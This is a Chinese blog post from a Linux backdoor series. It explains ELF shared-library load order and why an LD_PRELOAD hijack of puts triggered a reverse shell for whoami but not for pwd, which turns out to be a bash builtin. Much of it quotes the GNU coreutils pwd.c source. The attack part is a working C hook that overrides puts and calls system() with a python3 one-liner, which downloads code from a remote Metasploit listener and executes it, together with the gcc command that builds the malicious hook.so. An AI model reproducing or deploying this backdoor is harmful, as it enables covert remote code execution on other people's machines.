LD_PRELOAD 劫持 PWD 为什么失败了 | Linux 后门系列
这篇文章主要讲两个事情,第一个是Linux ELF文件共享库加载顺序,第二个是之前 LD_PRELOAD 劫持 pwd 失败的事情,第二件事我要大讲特讲,但对于大家帮助可能不会很大,为了解决这个问题我研究了一年,所以别怪我话多了
Linux ELF 共享库加载顺序
LD_PRELOAD -> /etc/ld.so.preload -> DT_RPATH(编译指定) -> LD_LIBRARY_PATH -> [/etc/ld.so.conf] -> /lib -> /usr/lib
/etc/ld.so.nohwcap 这个文件如果存在,可以禁止加载优化的库,不需要写任何内容
如果存在此文件,则动态链接程序将加载库的非优化版本,即使CPU支持优化版本也是如此。
对于大多数对技术没有那么偏执的兄弟在这里可以结束了,上面内容作为LD_PRELOAD后门知识点的补充
LD_PRELOAD 劫持 PWD 为什么失败了
绝大多数看这个问题应该会很蒙,我简单介绍一下背景,2020-07-05 我写了以下这篇文章
在这篇文章的最后,我遗憾得告诉大家,劫持 whoami 命令很顺利,但是劫持 pwd 却失败,到最后都没有解决,实际上我做了很多的尝试,问了一些人,也没有得到解决
为此呢,我去学习了 Linux C语言,Linux 汇编,Linux 链接装载等相关知识,终于在快一年的时候,我把这个问题解决了
它就像一座小山,挡在我前面,我一边成长,一边时不时去踹两脚,看看能不能解决问题...
如果你对我解决这个问题所做出的一系列蠢事感兴趣,那下面开始我们的冒险
经过测试我发现:
使用 LD_PRELOAD 劫持 puts 函数后,执行 whoami 就会有shell反弹到msf上,但是同样调用 puts 的 pwd 就死活弹不回来
使用
ltrace
命令追踪 whoami 和 pwd 命令,这样两个命令都可以反弹shell使用
ltrace
追踪 ssh、id 等命令的时候不会反弹shell
从上面的现象我们可以看出, ltrace 本身不会触发 payload,所以 ltrace 追踪 pwd 能够触发payload 反弹shell主要还是因为 pwd,所以本质上还是因为 whoami 和 pwd 两个命令不同
0x01 源代码
我开始怀疑pwd的源代码中会不会根本就没有调用 puts ,在和 ltrace 配合使用的时候因为一些底层缘故调用了 puts 函数,导致反弹shell,所以我去查了 pwd 的源代码
pwd 和 whoami 命令都源于 coreutils 软件包,可以从以下网址下载到
http://www.gnu.org/software/coreutils/
https://launchpad.net/ubuntu/+source/coreutils
第二个链接是 ubuntu 的,我们可以通过 sudo aptitude show coreutils
查看当前系统的 coreutils 版本,默认 aptitude 是没有安装的,可以使用 sudo apt install aptitude
进行安装
可以看到是 8.25 版本,于是乎,我下载了 ubuntu 的 8.25 版本的 coreutils 源代码进行查看,如果想在ubuntu上直接下载源代码可以使用 apt-get source coreutils
来下载到当前目录
whoami.c 和 pwd.c 源代码对比我就不写了,篇幅有限,直接贴 pwd 的源代码
/* pwd - print current directory
Copyright (C) 1994-2016 Free Software Foundation, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>. */
#include <config.h>
#include <getopt.h>
#include <stdio.h>
#include <sys/types.h>
#include "system.h"
#include "error.h"
#include "quote.h"
#include "root-dev-ino.h"
#include "xgetcwd.h"
/* The official name of this program (e.g., no 'g' prefix). */
#define PROGRAM_NAME "pwd"
#define AUTHORS proper_name ("Jim Meyering")
struct file_name
{
char *buf;
size_t n_alloc;
char *start;
};
static struct option const longopts[] =
{
{"logical", no_argument, NULL, 'L'},
{"physical", no_argument, NULL, 'P'},
{GETOPT_HELP_OPTION_DECL},
{GETOPT_VERSION_OPTION_DECL},
{NULL, 0, NULL, 0}
};
void
usage (int status)
{
if (status != EXIT_SUCCESS)
emit_try_help ();
else
{
printf (_("Usage: %s [OPTION]...\n"), program_name);
fputs (_("\
Print the full filename of the current working directory.\n\
\n\
"), stdout);
fputs (_("\
-L, --logical use PWD from environment, even if it contains symlinks\n\
-P, --physical avoid all symlinks\n\
"), stdout);
fputs (HELP_OPTION_DESCRIPTION, stdout);
fputs (VERSION_OPTION_DESCRIPTION, stdout);
fputs (_("\n\
If no option is specified, -P is assumed.\n\
"), stdout);
printf (USAGE_BUILTIN_WARNING, PROGRAM_NAME);
emit_ancillary_info (PROGRAM_NAME);
}
exit (status);
}
static void
file_name_free (struct file_name *p)
{
free (p->buf);
free (p);
}
static struct file_name *
file_name_init (void)
{
struct file_name *p = xmalloc (sizeof *p);
/* Start with a buffer larger than PATH_MAX, but beware of systems
on which PATH_MAX is very large -- e.g., INT_MAX. */
p->n_alloc = MIN (2 * PATH_MAX, 32 * 1024);
p->buf = xmalloc (p->n_alloc);
p->start = p->buf + (p->n_alloc - 1);
p->start[0] = '\0';
return p;
}
/* Prepend the name S of length S_LEN, to the growing file_name, P. */
static void
file_name_prepend (struct file_name *p, char const *s, size_t s_len)
{
size_t n_free = p->start - p->buf;
if (n_free < 1 + s_len)
{
size_t half = p->n_alloc + 1 + s_len;
/* Use xnmalloc+free rather than xnrealloc, since with the latter
we'd end up copying the data twice: once via realloc, then again
to align it with the end of the new buffer. With xnmalloc, we
copy it only once. */
char *q = xnmalloc (2, half);
size_t n_used = p->n_alloc - n_free;
p->start = q + 2 * half - n_used;
memcpy (p->start, p->buf + n_free, n_used);
free (p->buf);
p->buf = q;
p->n_alloc = 2 * half;
}
p->start -= 1 + s_len;
p->start[0] = '/';
memcpy (p->start + 1, s, s_len);
}
/* Return a string (malloc'd) consisting of N '/'-separated ".." components. */
static char *
nth_parent (size_t n)
{
char *buf = xnmalloc (3, n);
char *p = buf;
size_t i;
for (i = 0; i < n; i++)
{
memcpy (p, "../", 3);
p += 3;
}
p[-1] = '\0';
return buf;
}
/* Determine the basename of the current directory, where DOT_SB is the
result of lstat'ing "." and prepend that to the file name in *FILE_NAME.
Find the directory entry in '..' that matches the dev/i-node of DOT_SB.
Upon success, update *DOT_SB with stat information of '..', chdir to '..',
and prepend "/basename" to FILE_NAME.
Otherwise, exit with a diagnostic.
PARENT_HEIGHT is the number of levels '..' is above the starting directory.
The first time this function is called (from the initial directory),
PARENT_HEIGHT is 1. This is solely for diagnostics.
Exit nonzero upon error. */
static void
find_dir_entry (struct stat *dot_sb, struct file_name *file_name,
size_t parent_height)
{
DIR *dirp;
int fd;
struct stat parent_sb;
bool use_lstat;
bool found;
dirp = opendir ("..");
if (dirp == NULL)
error (EXIT_FAILURE, errno, _("cannot open directory %s"),
quote (nth_parent (parent_height)));
fd = dirfd (dirp);
if ((0 <= fd ? fchdir (fd) : chdir ("..")) < 0)
error (EXIT_FAILURE, errno, _("failed to chdir to %s"),
quote (nth_parent (parent_height)));
if ((0 <= fd ? fstat (fd, &parent_sb) : stat (".", &parent_sb)) < 0)
error (EXIT_FAILURE, errno, _("failed to stat %s"),
quote (nth_parent (parent_height)));
/* If parent and child directory are on different devices, then we
can't rely on d_ino for useful i-node numbers; use lstat instead. */
use_lstat = (parent_sb.st_dev != dot_sb->st_dev);
found = false;
while (1)
{
struct dirent const *dp;
struct stat ent_sb;
ino_t ino;
errno = 0;
if ((dp = readdir_ignoring_dot_and_dotdot (dirp)) == NULL)
{
if (errno)
{
/* Save/restore errno across closedir call. */
int e = errno;
closedir (dirp);
errno = e;
/* Arrange to give a diagnostic after exiting this loop. */
dirp = NULL;
}
break;
}
ino = D_INO (dp);
if (ino == NOT_AN_INODE_NUMBER || use_lstat)
{
if (lstat (dp->d_name, &ent_sb) < 0)
{
/* Skip any entry we can't stat. */
continue;
}
ino = ent_sb.st_ino;
}
if (ino != dot_sb->st_ino)
continue;
/* If we're not crossing a device boundary, then a simple i-node
match is enough. */
if ( ! use_lstat || ent_sb.st_dev == dot_sb->st_dev)
{
file_name_prepend (file_name, dp->d_name, _D_EXACT_NAMLEN (dp));
found = true;
break;
}
}
if (dirp == NULL || closedir (dirp) != 0)
{
/* Note that this diagnostic serves for both readdir
and closedir failures. */
error (EXIT_FAILURE, errno, _("reading directory %s"),
quote (nth_parent (parent_height)));
}
if ( ! found)
error (EXIT_FAILURE, 0,
_("couldn't find directory entry in %s with matching i-node"),
quote (nth_parent (parent_height)));
*dot_sb = parent_sb;
}
/* Construct the full, absolute name of the current working
directory and store it in *FILE_NAME.
The getcwd function performs nearly the same task, but is typically
unable to handle names longer than PATH_MAX. This function has
no such limitation. However, this function *can* fail due to
permission problems or a lack of memory, while GNU/Linux's getcwd
function works regardless of restricted permissions on parent
directories. Upon failure, give a diagnostic and exit nonzero.
Note: although this function is similar to getcwd, it has a fundamental
difference in that it gives a diagnostic and exits upon failure.
I would have liked a function that did not exit, and that could be
used as a getcwd replacement. Unfortunately, considering all of
the information the caller would require in order to produce good
diagnostics, it doesn't seem worth the added complexity.
In any case, any getcwd replacement must *not* exceed the PATH_MAX
limitation. Otherwise, functions like 'chdir' would fail with
ENAMETOOLONG.
FIXME-maybe: if find_dir_entry fails due to permissions, try getcwd,
in case the unreadable directory is close enough to the root that
getcwd works from there. */
static void
robust_getcwd (struct file_name *file_name)
{
size_t height = 1;
struct dev_ino dev_ino_buf;
struct dev_ino *root_dev_ino = get_root_dev_ino (&dev_ino_buf);
struct stat dot_sb;
if (root_dev_ino == NULL)
error (EXIT_FAILURE, errno, _("failed to get attributes of %s"),
quoteaf ("/"));
if (stat (".", &dot_sb) < 0)
error (EXIT_FAILURE, errno, _("failed to stat %s"), quoteaf ("."));
while (1)
{
/* If we've reached the root, we're done. */
if (SAME_INODE (dot_sb, *root_dev_ino))
break;
find_dir_entry (&dot_sb, file_name, height++);
}
/* See if a leading slash is needed; file_name_prepend adds one. */
if (file_name->start[0] == '\0')
file_name_prepend (file_name, "", 0);
}
/* Return PWD from the environment if it is acceptable for 'pwd -L'
output, otherwise NULL. */
static char *
logical_getcwd (void)
{
struct stat st1;
struct stat st2;
char *wd = getenv ("PWD");
char *p;
/* Textual validation first. */
if (!wd || wd[0] != '/')
return NULL;
p = wd;
while ((p = strstr (p, "/.")))
{
if (!p[2] || p[2] == '/'
|| (p[2] == '.' && (!p[3] || p[3] == '/')))
return NULL;
p++;
}
/* System call validation. */
if (stat (wd, &st1) == 0 && stat (".", &st2) == 0 && SAME_INODE (st1, st2))
return wd;
return NULL;
}
int
main (int argc, char **argv)
{
char *wd;
/* POSIX requires a default of -L, but most scripts expect -P.
Currently shells default to -L, while stand-alone
pwd implementations default to -P. */
bool logical = (getenv ("POSIXLY_CORRECT") != NULL);
initialize_main (&argc, &argv);
set_program_name (argv[0]);
setlocale (LC_ALL, "");
bindtextdomain (PACKAGE, LOCALEDIR);
textdomain (PACKAGE);
atexit (close_stdout);
while (1)
{
int c = getopt_long (argc, argv, "LP", longopts, NULL);
if (c == -1)
break;
switch (c)
{
case 'L':
logical = true;
break;
case 'P':
logical = false;
break;
case_GETOPT_HELP_CHAR;
case_GETOPT_VERSION_CHAR (PROGRAM_NAME, AUTHORS);
default:
usage (EXIT_FAILURE);
}
}
if (optind < argc)
error (0, 0, _("ignoring non-option arguments"));
if (logical)
{
wd = logical_getcwd ();
if (wd)
{
puts (wd);
return EXIT_SUCCESS;
}
}
wd = xgetcwd ();
if (wd != NULL)
{
puts (wd);
free (wd);
}
else
{
struct file_name *file_name = file_name_init ();
robust_getcwd (file_name);
puts (file_name->start);
file_name_free (file_name);
}
return EXIT_SUCCESS;
}
其实不算长,我们直接找 puts 的调用,下面截取最重要的一部分
可以看到,在一个 if .. else 语句中,if 和 else 中都存在 puts 函数,所以说如果代码执行到这里,一定会调用 puts 函数,所以从源代码来看,不调用 puts 的唯一可能性就是:执行到这个 if else 之前程序就退出了,接下来我们重新编译源代码,我们加入一些 printf 进行输出标记,看看到底执行到了没有
编译过程参考 https://blog.csdn.net/zyt157376/article/details/85371911
这里提一点:默认情况编译器会自作聪明将只有一个字符串参数的printf替换成puts 函数,使用
-fno-builtin
参数可以禁止这种情况
具体我做了,但是不写了,直接说结论,执行到 if .. else 中了,更加奇怪的是,我编译出的二进制文件执行竟然会触发 payload 反弹shell
这下我彻底蒙了,由于对于 Linux 编译,链接等知识的缺乏,我不自信的认为肯定是自己编译的问题,自己编译方法有问题,即使正常执行,但是肯定和系统的不一样
于是乎我开始学习 Linux 的各种知识,在这期间真的是感谢 《程序员的自我修养》这本书,将知识讲解的非常详细,关键是详细的恰到好处,我相信作者一定是一个很有心的人
...
...
...
掌握了一些知识后,我又来分析这个事情了,我发现编译命令应该没问题,但是可能是编译方式有问题
0x02 编译方式
会不会 whoami 是动态编译的,而pwd是静态编译的?所以我验证了一下
whoami
可以看出, whoami 是动态编译的
pwd
可以看出,pwd 也是动态编译的
看到如此绝望的结果,我又开始了学习
...
...
0x03 目录位置原因
whoami二进制文件位于 /usr/bin/whoami , pwd的二进制文件位于 /bin/pwd ,这会不会是原因呢?
为此,我专门查阅了一下这两个目录以及其他目录的一些意义,简单来说:
/bin 系统命令
/usr/bin/ 用户需要的一些命令,非系统必须
难道是因为这个?查询了一堆资料以后,没有发现两个目录存在调用函数上面的差异,所以于是放弃这个想法
0x04 救命法宝 LD_DEBUG
我把《程序员的自我修养》这本书又看了一遍,我看到了这个环境变量,能够对共享库调用进行 debug,似乎可以监控一下试试
还是使用劫持 puts 的那一个代码,payload使用 msf 的payload
根据 msf 的 payload 修改代码
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>
int puts(const char *message) {
int (*new_puts)(const char *message);
int result;
new_puts = dlsym(RTLD_NEXT, "puts");
system("python3 -c \"import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.31.244:8080/s8xyDwg5', context=ssl._create_unverified_context());exec(r.read());\"");
result = new_puts(message);
return result;
}
gcc preload.c -o hook.so -fPIC -shared -ldl -D_GNU_SOURCE
将 LD_PRELOAD 环境变量指向我们的 hook.so 文件
为了将系统本身程序调用产生的debug 信息屏蔽掉,我们不设置全局的 LD_DEBUG 环境变量,使用 LD_DEBUG=files command
这种形式进行debug
首先对 whoami 进行 debug
加载了 hook.so ,并且成功反弹shell
对 pwd 进行 debug
没有反弹shell可以理解,因为之前就没有反弹成功,我们就在解决这个事,但是pwd这个命令不加载任何共享库就不对劲了,之前我们测试过了, /bin/pwd 是个动态编译的文件,动态编译的文件怎么可能一点共享库都不加载呢?于是我把 LD_DEBUG 的值设置为 all ,看看是不是做了其他的操作
这个时候我就有些蒙了,但同时也大概有个轮廓了,不是我们劫持函数的问题,是这个程序似乎有点东西呀
0x05 转折点
有一天我无聊,测试这个的时候发现,执行 pwd 不会反弹shell,但是执行 /bin/pwd 的时候竟然会触发 payload 反弹shell
说到这里很多朋友大概知道是什么原因了
到这里我带着兴奋有点蒙了,难道我平时执行的 pwd 不是 /bin/pwd 吗???
使用 type -a command
进行查看
我擦,还真不是,没错,我又开始了查资料,发现其实我们平时执行的 pwd 并不是 /bin/pwd ,而是 bash、zsh 等自己集成的,那么是不是 /bin 目录下命令都是 bash 集成的呢?
也不是,其实是 bash 怕像cd pwd 这种命令 /bin 目录下的二进制文件在不同系统中存在差异,所以自己集成了cd pwd 等命令
bash 内置命令一般有两个原因,一种是为了兼容性,为了不被外部程序干扰,比如 cd pwd 命令;另一种是为了执行的效率,bash内置更加高效一些
所以 cd pwd 内置命令执行的时候不会加载外部共享库,也就是不会去加载我们的 hook.so ,更不会劫持 puts 函数
就这样...